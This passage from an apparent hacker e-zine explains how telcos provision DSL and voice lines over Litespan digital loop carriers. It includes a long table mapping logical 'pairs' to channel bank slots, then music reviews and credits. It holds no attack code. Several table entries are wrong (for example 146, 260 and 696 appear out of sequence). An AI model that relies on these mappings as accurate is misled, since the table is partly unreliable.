miles from a central office) to purchase the same high-speed DSL line as
someone who lives only a block away from the CO itself. Fiber's signal
degradation over distance is much MUCH more forgiving than plain
copper, and its available bandwidth can also handle the massive amounts
of traffic generated by broadband users.

A new piece of equipment called the Litespan2000 (manufactured by
Alcatel) makes this common distribution for multiple service-types
possible. The Litespan is a sort of generic rackmount cabinet that houses
a number of appropriate cards specialized for each service being offered
out of the terminal. Card types are specialized to POTS, ISDN, and ADLU
(which can carry DSL and/or voice and cost significantly more than the
other types), and generally carry four lines per card. These units are
being used to replace traditional copper and Pair Gain (PG) paths to the
customer premises. Even non-DSL, voice-only traffic will eventually be
carried by this distribution method.

The diagram below illustrates the basic layout designed for use with
DSL. The Central Office Terminal (COT) Litespan connects via OC03 to an
RT Litespan in the field. The RT serves copper to voice, data, and line
share customers within its 12Kft service area. Cross connections are no
longer entered manually by technicians in the field, but are provisioned
electronically by a database system that erects logical 'opticals' between
the corresponding cards in the COT and RT, respectively. These
assignments can be changed remotely among 'pairs' allocated to each RT
without sending a technician into the field.

.--------------------------------------------------------------------.
| |
| .------------------------------------. |
| | | |
| | (Area served by COT1 ---|--- RTE1 |
| | CO DSLAMs | |
| | <12Kft) | |
| | COT2 ---|--- RTE1 --- RTE2 |
| | | | |
| | | | (Area served by |
| '------------------------------|-----' Remote Terminals |
| | >12Kft) |
| RTE3 |
| |
'--------------------------------------------------------------------'

The DLE path between the CO and the Subscriber looks something like this:


DLE Environment

Sub. ----------------- Sub.
|
Sub. --------|-------- Sub.
|
|
(OC03) |
COT ============ RT ------- X-Box --------- Serving
(F1) (F2) Terminal


Notice the shift in the position of the F1 and F2 pairs. Assignment
data in LFACS looks a bit different for DLE than it does for old-style CA
and PG cable pairs; much to the confusion of many telco employees in the
LAC who can't seem to get the hang of "all this new stuff."


_/ The Cable Pairs Are All in Your Head

So 'pairs' look different with DLE. Just remember that a 'pair' for
DLE is actually a reference to a logical assignment within the OC03.

Coming out of the Remote Terminal, a familiar copper line will run up
to the Subscriber's home and into their DSL voice/data splitter, or
straight into their voice-only demarcation point. For DSL subscribers,
traffic will travel between the RT and their home in the standard ANSI
format:

The ADSL Standard -- Discreet Multitone (DMT)
ANSI T1.413 compliant

- Voice and data on one copper pair -- separated by splitters
- Bandwidth is adjustable in 32Kbps increments
- Maximum bandwidth: 800Kbps upstream, 8MBps downstream


A | POTS UPSTREAM DOWNSTREAM
m | ___ ________ __________________
p | .' '. .' '. .' '.
l | | | | | | |
i | .' '. .' '. .' '.
t | | | | | | |
u |.' '. .' '. .' '.
d || | | | | |
e |' '. .' '. .' '.
'-------------------------------------------------------------------
0 4 0 134 181 1100
FREQUENCY (kHz)


But what about before it gets to the RT?

Back at the CO, the voice portion of the line comes off the voice
switch and is processed through the Central Office Terminal (COT) (a
Litespan unit just like the RTs in the field), which bundles each voice
channel into the OC03 that feeds the RT. Data travels from/to the ISP
through the Optical Concentration Device (OCD) and arrives at the RT
logically separated from the voice channels. A combiner at the RT puts
the line share onto copper and into your home.


DSL Line Share Network Diagram


ISP
| .----------------------------.
| | |
Router | Voice Switch ----- COT ---|--(Voice)--.
| | | |
| | | |-- RT -- X-box
ATM | Optical | | |
Network ---|-- Concentration -----------|--(Data)---' |
| Device (OCD) | |
| | Sub.
| |
| (Central Office) |
| |
'----------------------------'


This all leads to a 'pair assignment' in LFACS which corresponds to a
channel bank, slot, and port on the Litespan (COT or RT) itself instead
of an actual copper cable (since it now exists only as a logical label
'inside' the OC03). The chart below can be used to translate a 'pair'
(SWITCH/DLE inventories this assignment as both a 'pair' and a Carrier
Controller Port (CCPT), which actually lists the channel bank/slot
information in a format similar to 'COT-1-1-1'):


Litespan Channel Bank Pair/Slot Layouts

+----------------------------------------------------------------------------+
| | |
| B | P 1 5 9 13 17 21 25 29 33 37 41 45 49 53 57 61 |
| a | A 2 6 10 14 18 22 26 30 34 38 42 46 50 54 58 62 |
| n | I 3 7 11 15 19 23 27 31 35 39 43 47 51 55 59 63 |
| k | R 4 8 12 16 20 24 28 32 36 40 44 48 52 56 60 64 |
| |------------------------------------------------------------------------|
| 1 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 65 69 73 77 81 85 89 93 97 101 105 109 113 117 121 125 |
| a | A 66 70 74 78 82 86 90 94 98 102 106 110 114 118 122 126 |
| n | I 67 71 75 79 83 87 91 95 99 103 107 111 115 119 123 127 |
| k | R 68 72 76 80 84 88 92 96 100 104 108 112 116 120 124 128 |
| |------------------------------------------------------------------------|
| 1 | Slot 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 129 133 137 141 145 149 153 157 161 165 169 173 177 181 185 189 |
| a | A 130 134 138 142 146 150 154 158 162 166 170 174 178 182 186 190 |
| n | I 131 135 139 143 147 151 155 159 163 167 171 175 179 183 187 191 |
| k | R 132 136 140 144 148 152 146 160 164 168 172 176 180 184 188 192 |
| |------------------------------------------------------------------------|
| 1 | Slot 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 193 197 201 205 209 213 217 221 |
| a | A 194 198 202 206 210 214 218 222 |
| n | I 195 199 203 207 211 215 219 223 |
| k | R 196 200 204 208 212 216 220 224 |
| |------------------------------------------------------------------------|
| 1 | Slot 49 50 51 52 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 227 231 235 239 243 247 251 255 259 263 267 271 275 279 283 287 |
| a | A 228 232 236 240 244 248 252 256 260 264 268 272 276 280 284 288 |
| n | I 229 233 237 241 245 249 253 257 261 265 269 273 277 281 285 289 |
| k | R 230 234 238 242 246 250 254 258 262 266 270 274 278 282 286 290 |
| |------------------------------------------------------------------------|
| 2 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 291 295 299 303 307 311 315 319 323 327 331 335 339 343 347 351 |
| a | A 292 296 300 304 308 312 316 320 324 328 332 336 340 344 348 352 |
| n | I 293 297 301 305 309 313 317 321 325 329 333 337 341 345 349 353 |
| k | R 294 298 302 306 310 314 318 322 326 330 334 338 342 346 350 354 |
| |------------------------------------------------------------------------|
| 2 | Slot 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 355 359 363 367 371 375 379 383 387 391 395 399 403 407 411 415 |
| a | A 356 260 364 368 372 376 380 384 388 392 396 400 404 408 412 416 |
| n | I 357 261 365 369 373 377 381 385 389 393 397 401 405 409 413 417 |
| k | R 358 262 366 370 374 378 382 386 390 394 398 402 405 410 414 418 |
| |------------------------------------------------------------------------|
| 2 | Slot 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 419 423 427 431 435 439 443 447 |
| a | A 420 424 428 432 436 440 444 448 |
| n | I 421 425 429 433 437 441 445 449 |
| k | R 422 426 430 434 438 442 446 450 |
| |------------------------------------------------------------------------|
| 2 | Slot 49 50 51 52 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 451 455 459 463 467 471 475 479 483 487 491 495 499 503 507 511 |
| a | A 452 456 460 464 468 472 476 480 484 488 492 496 500 504 508 512 |
| n | I 453 457 461 465 469 473 477 481 485 489 493 497 501 505 509 513 |
| k | R 454 458 462 466 470 474 478 482 486 490 494 498 502 506 510 514 |
| |------------------------------------------------------------------------|
| 3 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 515 519 523 527 531 535 539 543 547 551 555 559 563 567 571 575 |
| a | A 516 520 524 528 532 536 540 544 548 552 556 560 564 568 572 576 |
| n | I 517 521 525 529 533 537 541 545 549 553 557 561 565 569 573 577 |
| k | R 518 522 526 530 534 538 542 546 550 554 558 562 566 570 574 578 |
| |------------------------------------------------------------------------|
| 3 | Slot 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 579 583 587 591 595 599 603 607 611 615 619 623 627 631 635 639 |
| a | A 580 584 588 592 596 600 604 608 612 616 620 624 628 632 636 640 |
| n | I 581 585 589 593 597 601 605 609 613 617 621 625 629 633 637 641 |
| k | R 582 586 590 594 598 602 696 610 614 618 622 626 630 634 638 642 |
| |------------------------------------------------------------------------|
| 3 | Slot 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 643 647 651 655 659 663 667 671 |
| a | A 644 648 652 656 660 664 668 672 |
| n | I 645 649 653 657 661 665 669 673 |
| k | R 646 650 654 658 662 666 670 674 |
| |------------------------------------------------------------------------|
| 3 | Slot 49 50 51 52 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 677 681 685 689 693 697 701 705 709 713 717 721 725 729 733 737 |
| a | A 678 682 686 690 694 698 702 706 710 714 718 722 726 730 734 738 |
| n | I 679 683 687 691 695 699 703 707 711 715 719 723 727 731 735 739 |
| k | R 680 684 688 692 696 700 704 708 712 716 720 724 728 732 736 740 |
| |------------------------------------------------------------------------|
| 4 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 741 745 749 753 757 761 765 769 773 777 781 785 789 793 797 801 |
| a | A 742 746 750 754 758 762 766 770 774 778 782 786 790 794 798 802 |
| n | I 743 747 751 755 759 763 767 771 775 779 783 787 791 795 799 803 |
| k | R 744 748 752 756 760 764 768 772 776 780 784 788 792 796 800 804 |
| |------------------------------------------------------------------------|
| 4 | Slot 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 805 809 813 817 821 825 829 833 837 841 845 849 853 857 861 865 |
| a | A 806 810 814 818 822 826 830 834 838 842 846 850 854 858 862 866 |
| n | I 807 811 815 819 823 827 831 835 839 843 847 851 855 859 863 867 |
| k | R 808 812 816 820 824 828 832 836 840 844 848 852 856 860 864 868 |
| |------------------------------------------------------------------------|
| 4 | Slot 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 869 873 877 881 885 889 893 897 |
| a | A 870 874 878 882 886 890 894 898 |
| n | I 871 875 879 883 887 891 895 899 |
| k | R 872 876 880 884 888 892 896 900 |
| |------------------------------------------------------------------------|
| 4 | Slot 49 50 51 52 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 901 905 909 913 917 921 925 929 933 937 941 945 949 953 957 961 |
| a | A 902 906 910 914 918 922 926 930 934 938 942 946 950 954 958 962 |
| n | I 903 907 911 915 919 923 927 931 935 939 943 947 951 955 959 963 |
| k | R 904 908 912 916 920 924 928 932 936 940 944 948 952 956 960 964 |
| |------------------------------------------------------------------------|
| 5 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 965 969 973 977 981 985 989 993 997 1001 1005 1009 1013 |
| a | A 966 970 974 978 982 986 990 994 998 1002 1006 1010 1014 |
| n | I 967 971 975 979 983 987 991 995 999 1003 1007 1011 1015 |
| k | R 968 972 976 980 984 988 992 996 1000 1004 1008 1012 1016 |
| |------------------------------------------------------------------------|
| 5 | Slot 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1017 1021 1025 1029 1033 1037 1041 1045 1049 1053 1057 1061 1065 |
| a | A 1018 1022 1026 1030 1034 1038 1042 1046 1050 1054 1058 1062 1066 |
| n | I 1019 1023 1027 1031 1035 1039 1043 1047 1051 1055 1059 1063 1067 |
| k | R 1020 1024 1028 1032 1036 1040 1044 1048 1052 1056 1060 1064 1068 |
| |------------------------------------------------------------------------|
| 5 | Slot 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1069 1073 1077 1081 1085 1089 1093 1097 1101 1105 1109 1113 1117 |
| a | A 1070 1074 1078 1082 1086 1090 1094 1098 1102 1106 1110 1114 1118 |
| n | I 1071 1075 1079 1083 1087 1091 1095 1099 1103 1107 1111 1115 1119 |
| k | R 1072 1076 1080 1084 1088 1092 1096 1100 1104 1108 1112 1116 1120 |
| |------------------------------------------------------------------------|
| 5 | Slot 43 44 45 46 47 48 49 50 51 52 53 54 55 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1121 |
| a | A 1122 |
| n | I 1123 |
| k | R 1124 |
| |------------------------------------------------------------------------|
| 5 | Slot 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 1127 1131 1135 1139 1143 1147 1151 1155 1159 1163 1167 1171 1175 |
| a | A 1128 1132 1136 1140 1144 1148 1152 1156 1160 1164 1168 1172 1176 |
| n | I 1129 1133 1137 1141 1145 1149 1153 1157 1161 1165 1169 1173 1177 |
| k | R 1130 1134 1138 1142 1146 1150 1154 1158 1162 1166 1170 1174 1178 |
| |------------------------------------------------------------------------|
| 6 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1179 1183 1187 1191 1195 1199 1203 1207 1211 1215 1219 1223 1227 |
| a | A 1180 1184 1188 1192 1196 1200 1204 1208 1212 1216 1220 1224 1228 |
| n | I 1181 1185 1189 1193 1197 1201 1205 1209 1213 1217 1221 1225 1229 |
| k | R 1182 1186 1190 1194 1198 1202 1206 1210 1214 1218 1222 1229 1230 |
| |------------------------------------------------------------------------|
| 6 | Slot 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1231 1235 1239 1243 1247 1251 1255 1259 1263 1267 1271 1275 1279 |
| a | A 1232 1236 1240 1244 1248 1252 1256 1260 1264 1268 1272 1276 1280 |
| n | I 1233 1237 1241 1245 1249 1253 1257 1261 1265 1269 1273 1277 1281 |
| k | R 1254 1238 1242 1256 1250 1254 1258 1262 1266 1270 1274 1278 1282 |
| |------------------------------------------------------------------------|
| 6 | Slot 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1283 1287 1291 1295 1299 1303 1307 1311 1315 1319 1323 1327 1331 |
| a | A 1284 1288 1292 1296 1300 1304 1308 1312 1316 1320 1324 1328 1332 |
| n | I 1285 1289 1293 1297 1301 1305 1309 1313 1317 1321 1325 1329 1333 |
| k | R 1286 1290 1294 1298 1302 1306 1310 1314 1318 1322 1326 1330 1334 |
| |------------------------------------------------------------------------|
| 6 | Slot 40 41 42 43 44 45 46 47 48 49 50 51 52 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1335 1339 1343 1347 |
| a | A 1336 1340 1344 1348 |
| n | I 1337 1341 1345 1349 |
| k | R 1338 1342 1346 1350 |
| |------------------------------------------------------------------------|
| 6 | Slot 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 1351 1355 1359 1363 1367 1371 1375 1379 1383 1387 1391 1395 1399 |
| a | A 1352 1356 1360 1364 1368 1672 1376 1380 1384 1388 1392 1396 1400 |
| n | I 1353 1357 1361 1365 1369 1373 1377 1381 1385 1389 1393 1397 1401 |
| k | R 1354 1358 1362 1366 1370 1374 1378 1382 1356 1390 1394 1398 1402 |
| |------------------------------------------------------------------------|
| 7 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1403 1407 1411 1415 1419 1423 1427 1431 1435 1439 1443 1447 1451 |
| a | A 1404 1408 1412 1416 1420 1424 1428 1432 1436 1440 1444 1448 1452 |
| n | I 1405 1409 1413 1417 1421 1425 1429 1433 1437 1441 1445 1449 1453 |
| k | R 1406 1410 1414 1418 1422 1426 1430 1434 1438 1442 1446 1450 1454 |
| |------------------------------------------------------------------------|
| 7 | Slot 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1455 1459 1463 1467 1471 1475 1479 1483 1487 1491 1495 1499 1503 |
| a | A 1456 1460 1464 1468 1472 1476 1480 1484 1488 1492 1496 1500 1504 |
| n | I 1457 1461 1465 1469 1473 1477 1481 1485 1489 1493 1497 1501 1505 |
| k | R 1458 1462 1466 1470 1474 1478 1482 1486 1490 1494 1498 1502 1506 |
| |------------------------------------------------------------------------|
| 7 | Slot 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1507 1511 1515 1519 1523 1527 1531 1535 1539 1543 1547 1551 1555 |
| a | A 1508 1512 1516 1520 1524 1528 1532 1536 1540 1544 1548 1552 1556 |
| n | I 1509 1513 1517 1521 1525 1529 1533 1537 1541 1545 1549 1553 1557 |
| k | R 1510 1514 1518 1522 1526 1530 1534 1538 1542 1546 1550 1554 1558 |
| |------------------------------------------------------------------------|
| 7 | Slot 40 41 42 43 44 45 46 47 48 49 50 51 52 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1559 1563 1567 1571 |
| a | A 1560 1564 1568 1572 |
| n | I 1561 1565 1569 1573 |
| k | R 1562 1566 1570 1574 |
| |------------------------------------------------------------------------|
| 7 | Slot 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 1577 1581 1585 1589 1593 1597 1601 1605 1609 1613 1617 1621 1625 |
| a | A 1578 1582 1586 1590 1594 1598 1602 1606 1610 1614 1618 1622 1626 |
| n | I 1579 1583 1587 1591 1595 1599 1603 1607 1611 1615 1619 1623 1627 |
| k | R 1580 1584 1588 1592 1596 1600 1604 1608 1612 1616 1620 1624 1628 |
| |------------------------------------------------------------------------|
| 8 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1629 1633 1637 1641 1645 1649 1653 1657 1661 1665 1669 1673 1677 |
| a | A 1630 1634 1638 1642 1646 1650 1654 1658 1662 1666 1670 1674 1678 |
| n | I 1631 1635 1639 1643 1647 1651 1655 1659 1663 1667 1671 1675 1679 |
| k | R 1632 1636 1640 1644 1648 1652 1656 1660 1664 1668 1672 1676 1680 |
| |------------------------------------------------------------------------|
| 8 | Slot 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1681 1685 1689 1693 1697 1701 1705 1709 1713 1717 1721 1725 1729 |
| a | A 1682 1686 1690 1694 1698 1702 1706 1710 1714 1718 1722 1726 1730 |
| n | I 1683 1687 1691 1695 1699 1703 1707 1711 1715 1719 1723 1727 1731 |
| k | R 1684 1688 1692 1696 1700 1704 1708 1712 1716 1720 1724 1728 1732 |
| |------------------------------------------------------------------------|
| 8 | Slot 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1733 1737 1741 1745 1749 1753 1757 1761 1765 1769 1773 1777 1781 |
| a | A 1734 1738 1742 1746 1750 1754 1758 1762 1766 1770 1774 1778 1782 |
| n | I 1735 1739 1743 1747 1751 1755 1759 1763 1767 1771 1775 1779 1783 |
| k | R 1736 1740 1744 1748 1752 1756 1760 1764 1768 1772 1776 1780 1784 |
| |------------------------------------------------------------------------|
| 8 | Slot 40 41 42 43 44 45 46 47 48 49 50 51 52 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1785 1789 1793 1797 |
| a | A 1786 1790 1794 1798 |
| n | I 1787 1791 1795 1799 |
| k | R 1788 1792 1796 1800 |
| |------------------------------------------------------------------------|
| 8 | Slot 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+
+----------------------------------------------------------------------------+
| | |
| B | P 1801 1805 1809 1813 1817 1821 1825 1829 1833 1837 1841 1845 1849 |
| a | A 1802 1806 1810 1814 1818 1822 1826 1830 1834 1838 1842 1846 1850 |
| n | I 1803 1807 1811 1815 1819 1823 1827 1831 1835 1839 1843 1847 1851 |
| k | R 1804 1808 1812 1816 1820 1824 1828 1832 1836 1840 1844 1848 1852 |
| |------------------------------------------------------------------------|
| 9 | Slot 1 2 3 4 5 6 7 8 9 10 11 12 13 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1853 1857 1861 1865 1869 1873 1877 1881 1885 1889 1893 1897 1901 |
| a | A 1854 1858 1862 1866 1870 1874 1878 1882 1886 1890 1894 1898 1902 |
| n | I 1855 1859 1863 1867 1871 1875 1879 1883 1887 1891 1895 1899 1903 |
| k | R 1856 1860 1864 1868 1872 1876 1880 1884 1888 1892 1896 1900 1904 |
| |------------------------------------------------------------------------|
| 9 | Slot 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1905 1909 1913 1917 1921 1925 1929 1933 1937 1941 1945 1949 1953 |
| a | A 1906 1910 1914 1918 1922 1926 1930 1934 1938 1942 1946 1950 1954 |
| n | I 1907 1911 1915 1919 1923 1927 1931 1935 1939 1943 1947 1951 1955 |
| k | R 1908 1912 1916 1920 1924 1928 1932 1936 1940 1944 1948 1952 1956 |
| |------------------------------------------------------------------------|
| 9 | Slot 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 1957 1961 1965 1969 1973 1977 1981 1985 1989 1993 1997 2001 2005 |
| a | A 1958 1962 1966 1970 1974 1978 1982 1986 1990 1994 1998 2002 2006 |
| n | I 1959 1963 1967 1971 1975 1979 1983 1987 1991 1995 1999 2003 2007 |
| k | R 1960 1964 1968 1972 1976 1980 1984 1988 1992 1996 2000 2004 2008 |
| |------------------------------------------------------------------------|
| 9 | Slot 40 41 42 43 44 45 46 47 48 49 50 51 52 |
|---|------------------------------------------------------------------------|
|---|------------------------------------------------------------------------|
| | |
| B | P 2009 2013 2017 2021 |
| a | A 2010 2014 2018 2022 |
| n | I 2011 2015 2019 2023 |
| k | R 2012 2016 2020 2024 |
| |------------------------------------------------------------------------|
| 9 | Slot 53 54 55 56 |
| | |
+----------------------------------------------------------------------------+

[ Whew! Did all you readers get that? {kynik} ]

"Digital cross connections" create the virtual path between the COT and
RT Litespans. Each working line will thus have four individual CCPT
assignments: One for the COT channel bank, slot, and port; one COT
optical (the OC03 side virtual connection); one RT optical (ditto); and
one for the RT channel bank, slot, and port. This creates the virtual
path that the line travels. When you see a reference to the "pair" of a
DLE line, it will correspond directly to the RT CCPT on the chart above.

_/ Towards Complete Remote Management

The migration to DLE for even non-data customers moves the telcos one
step closer to complete remote management of facilities. Reportedly, some
Central Offices with Integrated (Alternate Channel) OEs are already
running without staff on site. The DLE provisioning model also leads to
less responsibility for the technician in the field. More and more,
hands-on contact with the equipment that provides connectivity to
customers is limited to the initial installation and/or actual hardware
replacement in the case of trouble.

A digital delivery medium also inches us closer to a true packet-
switched voice service. The fiber that is being laid to support this
roll-out of Litespan RTs can be reused in the future as carrier technology
advances. Implementation of future digital technologies may be
accomplished with a minimum of construction work.

The conversion to total DLE is likely to take several years. The
process has already been underway for over a year and is nowhere near
completion in any region. One factor has been the enormous cost of
supporting the DSL-capable cards in the already expensive RTs. ADLU cards
are reportedly ten times as expensive as regular POTS cards; and are not
being rolled out as quickly in areas which aren't already a hotbed for DSL
sales.

However, the copper environment we've been accustomed to for so long
cannot survive for long in this world of broadband madness and hi-tech
keeping up with the Joneses. The slings and arrows of competition have
already found sizeable chinks in the armor of the Bell system; and may yet
fell the slumbering giant.

No reason not to inspect the corpse.


_/ Caveats

As always, this information may not be used with some RBOCs. YMMV.


_/ Further Reading

Copper Loop Management in a Digital Environment: Migration from an
Analog to a Digital Local-Loop Network
[ http://www.iec.org/online/tutorials/copper/index.html ]

Digital Loop Carrier (DLC)
[ http://www.iec.org/online/tutorials/dlc/index.html ]


_/ "Will Blue Boxing Still Work?"

Shut up.



.-------------------------------------------------------------------.
| |
| _azure |
| |
`-------------------------------------------------------------------'

____________________________
--------------------- - ajax
[=] 0x07: Music Reviews

- The Crystal Method: Tweekend (http://www.thecrystalmethod.com/)

You know these guys. Their first album "Vegas" sold some ungodly number
of copies. They've remixed Garbage, Methods of Mayhem and Keoki. They're
possibly *the* biggest stateside breakbeat act, and with good cause.
"Tweekend", their second LP, is mighty impressive. Where Vegas is spacey,
Tweekend is aggressive. It has a much grittier low end and a more mature
instrumentation. If Vegas was violins, Tweekend is a Gibson SG and a
Marshall stack. I'm a fan, anyway. Guest talent on this album includes
Scott Weiland (of Stone Temple Pilots), Tom Morello (of Rage Against the
Machine), and DJ Swamp (Beck's DJ, US DMC Champion 1996). There's even a
secret track, a dub mix of "Name of the Game". Ajax says, "this doesn't
suck."

- Apartment 26: Hallucinating (http://www.apartment26.com)

See now... I dunno. This whole new metal thing is tricky, because there's
a lot of utter crap out there. Apt. 26 has done the Ozzfest thing, just
put out an album produced by the same guy that did Powerman 5000 and
Static-X's albums, and... I'm not sure. It's got a very drum 'n' bass
influence, which is interesting in a metal band, and I think I like that.
The record itself sounds like, well, noise, it sounds very poorly
produced. They do have a good amount of range, breakbeat to club to metal
to almost arena rock. I'm thinking this one will grow on me. It does
have definite scare-the-neighbors factor, and they're promising, but I
want to tell them to focus a little, and turn the gain down somewhere.

_________________
-----------------
[=] 0x08: Credits

Editor: Kynik <kynik@firest0rm.org>
Co-Editors: ajax <ajax@firest0rm.org>
Rsquared <rsquared@firest0rm.org>
Article Contributions: _azure <azure@gh0st.net>
echo8 <echo8@firest0rm.org>

To subscribe to this 'zine:
email napalm@firest0rm.org with a subject of SUBSCRIBE

To unsubscribe:
email napalm@firest0rm.org with a subject of UNSUBSCRIBE

Or find us online at:
http://napalm.firest0rm.org/

Submissions, questions, comments, and constructive chaos may also be
directed to kynik@firest0rm.org or any of the contributors

.n12! - eof

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close